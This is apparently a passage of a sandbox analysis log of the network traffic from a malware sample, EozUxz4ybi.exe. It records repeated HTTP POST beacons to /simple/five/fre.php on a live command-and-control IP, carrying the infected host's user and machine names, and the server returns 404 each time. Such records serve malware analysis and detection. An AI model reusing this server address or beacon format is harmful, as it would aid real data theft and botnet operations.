                                Jan 11, 2025 01:42:52.288988113 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:53.010909081 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:52 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                34192.168.2.84974094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:53.170571089 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:53.175498962 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:54.019459009 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:53 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                35192.168.2.84974194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:54.179584026 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:54.184422016 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:54.882802963 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:54 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                36192.168.2.84974294.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:55.030769110 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:55.035617113 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:55.732820988 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:55 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                37192.168.2.84974394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:55.987762928 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:55.992625952 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:56.756866932 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:56 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                38192.168.2.84974494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:56.908021927 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:56.917464018 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:57.656831026 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:57 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                39192.168.2.84974594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:57.807913065 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:57.813692093 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:58.531346083 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:58 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                40192.168.2.84974694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:58.981187105 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:58.986100912 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:59.839251041 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:59 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                41192.168.2.84974794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:59.998092890 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:00.003340006 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:00.717897892 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:00 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                42192.168.2.84974894.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:00.870846987 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:00.875735998 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:01.574404001 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:01 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                43192.168.2.84974994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:01.940114975 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:01.944953918 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:02.677066088 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:02 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                44192.168.2.84975094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:02.821182966 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:02.826097965 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:03.548398972 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:03 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                45192.168.2.85123094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:03.702738047 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:03.707674026 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:04.445255995 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:04 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                46192.168.2.85123194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:04.849174023 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:04.854033947 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:05.582495928 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:05 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                47192.168.2.85123294.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:05.731384993 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:05.736299038 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:06.451642036 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:06 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                48192.168.2.85123394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:06.609363079 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:06.614276886 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:07.362718105 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:07 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                49192.168.2.85123494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:07.768634081 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:07.773449898 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:08.501508951 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:08 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                50192.168.2.85123594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:08.655235052 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:08.660221100 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:09.359796047 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:09 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                51192.168.2.85123694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:09.509485960 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:09.514398098 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:10.257819891 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:10 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                52192.168.2.85123794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:10.702166080 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:10.707200050 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:11.447506905 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:11 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                53192.168.2.85123894.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:11.602649927 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:11.607611895 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:12.357177019 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:12 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                54192.168.2.85123994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:12.523875952 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
